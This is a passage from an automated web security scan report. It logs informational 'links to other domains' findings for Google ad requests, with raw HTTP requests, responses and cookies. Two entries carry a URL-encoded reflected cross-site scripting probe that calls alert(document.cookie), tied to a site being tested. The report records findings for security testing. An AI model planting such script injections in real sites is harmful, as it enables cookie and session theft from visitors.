Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 20:22:42 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 5217

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CIfj9KCwnqXiGhDYBRhaMggufhOkHiFuCA">
...[SNIP]...
%3Dhttps://www.freescoreonline.com/ppc/creditreport/index-GUSC1789a.ashx%253Fgtse%253Dgoog%2526gtkw%253DiFree_Credit_Scores_3Bureau_var1_im_cm_br_ma%253Dgoogle%2526site%253Dwww.fightidentitytheft.com"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CIfj9KCwnqXiGhDYBRhaMggufhOkHiFuCA" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBjb7MkYa0TZ7VOZO7sQftyYmGDe_pl8sBv5LipRrAjbcB4Jq9ARABGAEg2tH0ATgAUNebuPH5_____wFgye6DiPCj7BKgAdnB2_gDsgEad3d3LmZpZ2h0aWRlbnRpdHl0aGVmdC5jb226AQk3Mjh4OTBfYXPIAQTaAYABaHR0cDovL3d3dy5maWdodGlkZW50aXR5dGhlZnQuY29tL2NyZWRpdC1tb25pdG9yaW5nLmh0bWw_ODBmNTUlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRTgzODFmMDQ3ZGVhPTG4AhjIAufO0BWoAwH1AwAAAMA%26num%3D1%26ggladgrp%3D1248197529%26gglcreat%3D6965957439%26sig%3DAGiWqtzVjg5cHGrityxmz-mXTaDDMhEakg%26client%3Dca-pub-9314328132562548%26adurl%3Dhttps://www.freescoreonline.com/ppc/creditreport/index-GUSC1789a.ashx%253Fgtse%253Dgoog%2526gtkw%253DiFree_Credit_Scores_3Bureau_var1_im_cm_br_ma%253Dgoogle%2526site%253Dwww.fightidentitytheft.com" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.fightidentitytheft.com/credit-monitoring.html%253F80f55%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253E8381f047dea%253D1%26hl%3Den%26client%3Dca-pub-9314328132562548%26adU%3Dwww.FreeScoreOnline.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNGi_dU8HenPSfRo9luV2youEh55xw" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

23.417. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681828&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663828367&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303663828373&frm=1&adk=2614322350&ga_vid=2143277132.1303663828&ga_sid=1303663828&ga_hid=1947261372&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=9 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:50:25 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1832

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=e0ykNJvH5j97TKQ0m8fmPwAAAEAzMwdAe0ykNJvH5j97TKQ0m8fmP4tkw7_c_Kt8SsYda6b2ziXRVLRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sA8A4BAgUCAAQAAAAA8SX3XQAAAAA.&tt_code=vert-188&udj=uf%28%27a%27%2C+9797%2C+1303663852%29%3Buf%28%27c%27%2C+52368%2C+1303663852%29%3Buf%28%27r%27%2C+173254%2C+1303663852%29%3Bppv%288991%2C+%278983551906760844427%27%2C+1303663852%2C+1303707052%2C+52368%2C+25553%29%3B&cnd=!XRBRyQiQmQMQxskKGAAg0ccBKEsxQyNyhZvH5j9CCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php&pp=TbRU0QAHEu4K5XcWI-pL1bVUGxfbDqNZCZfoaA&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBuDo_0VS0Te6lHJbulQfVl6mfAtfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCWsACBMgChdLPCqgDAegDvAHoA5QC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtwKw2NSpsBuz7_grX_7oWb99Jw51w%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

23.418. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303679676&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F24%2Fdork%2Freflected-xss-cross-site-scripting-ghdb-cwe-79-capec-86-dictofcom.html&dt=1303661676521&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303661676522&frm=0&adk=1607234649&ga_vid=1319248185.1303661677&ga_sid=1303661677&ga_hid=1162375225&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&eid=33895130&fu=0&ifi=1&dtd=6&xpc=inJq61j3GE&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:14:33 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12305

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/24/dork/reflected-xss-cross-site-scripting-ghdb-cwe-79-capec-86-dictofcom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dvulnerability.management.qualys.com%26adT%3DWireless%2BVulnerability%26adU%3DPort80Software.com/ServerDefenderVP%26adT%3DWindows%2BServer%2BSecurity%26adU%3Dwww.juniper.net%26adT%3DSecure%2BSMB%2BNetwork%26gl%3DUS&amp;usg=AFQjCNEj86u0cPu7pxHbE3nJLu_Jte0FZg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.419. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679465&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661465689&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661465694&frm=1&adk=2614322350&ga_vid=1556381526.1303661466&ga_sid=1303661466&ga_hid=442508498&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:11:02 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14607

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</a>&nbsp;<img alt="" class=cbg height=10 src="http://pagead2.googlesyndication.com/pagead/badge/checkout_999999.gif" title="This site accepts Google Checkout" width=19><div class=adb>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Amazon.com%26adT%3DArnazon.com%25C2%25AE%2B-%2BShop%26adU%3DPeru.travel%26adT%3DTourism%2B-%2BAmazonia%26adU%3Dwww.webgility.com%26adT%3DAmazon%2B-sync-%2BQuickBooks%26adU%3DAmazon_Kindle.BigDeal.com%26adT%3DKindles%2BBlowout%2B-%2B93%2525%2BOff%26adU%3Dwww.GoECart.com/Sell_More%26adT%3DEasier%2BAmazon%2BStore%2BMgmt.%26gl%3DUS&amp;usg=AFQjCNGR-BnnrYpUH8FN70-PGqEQhfYWsg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.420. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679978&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661978410&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661978422&frm=1&adk=2614322350&ga_vid=1866286949.1303661978&ga_sid=1303661978&ga_hid=1215876184&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=28 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:19:35 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14519

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Cadillac.com/Escalade%26adT%3DMB%2BGL-Class%2Bvs%2BEscalade%26adU%3Darenasportsgrille.com%26adT%3DARENA%2BSports%2BBar%2B%2526amp%253B%2BGrill%26adU%3Dwww.GMC.com/Yukon%26adT%3DMB%2BGL450%2Bvs%2BGMC%2BYukon%26adU%3Dwww.GetBuzztime.com%26adT%3DCreate%2BPromotions%26adU%3Dwww.bizydeal.com%26adT%3DNew%2BPop%2BUp%2B10x10%2BBooth%26gl%3DUS&amp;usg=AFQjCNFgrpLTED0ySNW2hVqSPM5M2o6Wrg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.421. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679857&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661857045&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303661857051&frm=1&adk=2614322350&ga_vid=266911698.1303661857&ga_sid=1303661857&ga_hid=2137144456&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=10 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:17:34 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14627

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Cadillac.com/Escalade%26adT%3DMB%2BGL-Class%2Bvs%2BEscalade%26adU%3Darenasportsgrille.com%26adT%3DARENA%2BSports%2BBar%2B%2526amp%253B%2BGrill%26adU%3Dwww.GMC.com/Yukon%26adT%3DMB%2BGL450%2Bvs%2BGMC%2BYukon%26adU%3DPeru.travel%26adT%3DAmazonia%2BTourism%26adU%3Dwww.elitexpo.com%26adT%3DELITeXPO%26gl%3DUS&amp;usg=AFQjCNHPufPcCsTZ8WfM-qNrQ-vuHxvSpQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.422. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681358&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663358147&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303663358162&frm=1&adk=2614322350&ga_vid=2139755663.1303663358&ga_sid=1303663358&ga_hid=35243196&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=19 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:42:35 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14714

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Dell.com/Blades%26adT%3DSecure%2BServer%26adU%3Dwww.areasys.com%26adT%3DServers%2Bwith%2BIntel%2BXeon%26adU%3Dtripplite.com/CoolingSolution%26adT%3DCooling%2BSolutions%26adU%3Dwww.Isilon.com%26adT%3DDataCenter%2BVirtualization%26adU%3DAPC.com/DataCenterUniversity%26adT%3DRack%2BTechnologies%26gl%3DUS&amp;usg=AFQjCNGRMRtTkjg-GwjvGmhoCpg6A44jwQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.423. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303679620&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F24%2Fdork%2Freflected-xss-cross-site-scripting-ghdb-cwe-79-capec-86-pubretaileramazonnet.html&dt=1303661620514&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303661620584&frm=0&adk=1607234649&ga_vid=1144446417.1303661621&ga_sid=1303661621&ga_hid=1671834249&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=964&bih=907&fu=0&ifi=1&dtd=132&xpc=YJDw3ahEl9&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:13:38 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12689

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/24/dork/reflected-xss-cross-site-scripting-ghdb-cwe-79-capec-86-pubretaileramazonnet.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Cadillac.com/Escalade%26adT%3DMB%2BGL-Class%2Bvs%2BEscalade%26adU%3Dwww.GMC.com/Yukon%26adT%3DGMC%2BYukon%2BOfficial%2BSite%26adU%3DMBUSA.com/CPO%26adT%3DCertified%2BPre-Owned%2BEvent%26gl%3DUS&amp;usg=AFQjCNHiY1sN5Lrf42sJOR74H2WMT0qXPA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.424. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

